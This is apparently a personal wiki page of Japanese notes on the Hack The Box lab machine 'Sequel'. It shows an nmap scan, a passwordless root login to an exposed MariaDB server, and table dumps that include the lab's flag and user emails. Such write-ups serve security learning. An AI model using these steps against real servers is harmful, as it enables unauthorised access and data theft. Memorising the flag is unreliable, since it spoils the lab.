HTB_Sequel - meruneru/tech_memo GitHub Wiki
ă€ăłăăăźăă·ăł
#SQL ăźćéĄă #MySQL ăäœżăăăŠăăă
#ăăŒă3306 㯠#MySQL ă”ăŒăăźăăă ă
lq[htb-meruneru@htb-zs1gibg6pb]q[~]
mqqq $nmap -sV -sC -Pn 10.129.182.210
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-11-13 04:02 UTC
Nmap scan report for 10.129.182.210
Host is up (0.079s latency).
Not shown: 999 closed ports
PORT STATE SERVICE VERSION
3306/tcp open mysql?
| mysql-info:
| Protocol: 10
| Version: 5.5.5-10.3.27-MariaDB-0+deb10u1
| Thread ID: 90
| Capabilities flags: 63486
| Some Capabilities: ODBCClient, Support41Auth, Speaks41ProtocolOld, InteractiveClient, SupportsTransactions, IgnoreSpaceBeforeParenthesis, SupportsCompression, DontAllowDatabaseTableColumn, LongColumnFlag, FoundRows, Speaks41ProtocolNew, ConnectWithDatabase, IgnoreSigpipes, SupportsLoadDataLocal, SupportsMultipleResults, SupportsMultipleStatments, SupportsAuthPlugins
| Status: Autocommit
| Salt: (nv&Wer2@(Hs*u12HTKZ
|_ Auth Plugin Name: mysql_native_password
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 203.11 seconds
çčă«ăȘă
$mysql -u root -h 10.129.182.210
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| htb |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.082 sec)
MariaDB [(none)]>
MariaDB [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| htb |
| information_schema |
| mysql |
| performance_schema |
+--------------------+
4 rows in set (0.080 sec)
MariaDB [(none)]> use htb;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Database changed
MariaDB [htb]> show tables;
+---------------+
| Tables_in_htb |
+---------------+
| config |
| users |
+---------------+
2 rows in set (0.080 sec)
MariaDB [htb]> select * from config;
+----+-----------------------+----------------------------------+
| id | name | value |
+----+-----------------------+----------------------------------+
| 1 | timeout | 60s |
| 2 | security | default |
| 3 | auto_logon | false |
| 4 | max_size | 2M |
| 5 | flag | 7b4bec00d1a39e3dd4e021ec3d915da8 |
| 6 | enable_uploads | false |
| 7 | authentication_method | radius |
+----+-----------------------+----------------------------------+
7 rows in set (0.080 sec)
MariaDB [htb]> select * from users;
+----+----------+------------------+
| id | username | email |
+----+----------+------------------+
| 1 | admin | [email protected] |
| 2 | lara | [email protected] |
| 3 | sam | [email protected] |
| 4 | mary | [email protected] |
+----+----------+------------------+
4 rows in set (0.080 sec)